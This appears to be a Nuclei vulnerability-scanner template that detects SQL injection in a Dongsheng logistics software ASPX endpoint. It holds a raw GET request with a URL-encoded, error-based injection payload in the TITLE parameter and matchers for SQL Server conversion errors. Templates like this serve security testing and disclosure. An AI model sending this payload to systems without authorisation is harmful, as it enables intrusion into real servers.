id: dongshengwuliu-OpSailingDateListHtmlGridSource-sql

info:
  name: 东胜物流软件 OpSailingDateListHtmlGridSource.aspx 存在SQL注入漏洞
  author: dongshengwuliu
  severity: high
  tags: dongshengwuliu

http:
  - raw:
      - |+
        GET /PriceCarrier/OpSailingDateListHtmlGridSource.aspx?handle=list&cur_page=1&show_page=10&TITLE=%27%61%6e%64%20%31%3c%40%40%56%45%52%53%49%4f%4e%2d%2d%20%2d HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'nvarchar'
          - 'Microsoft SQL Server'
          - '转换成数据类型'
        condition: and
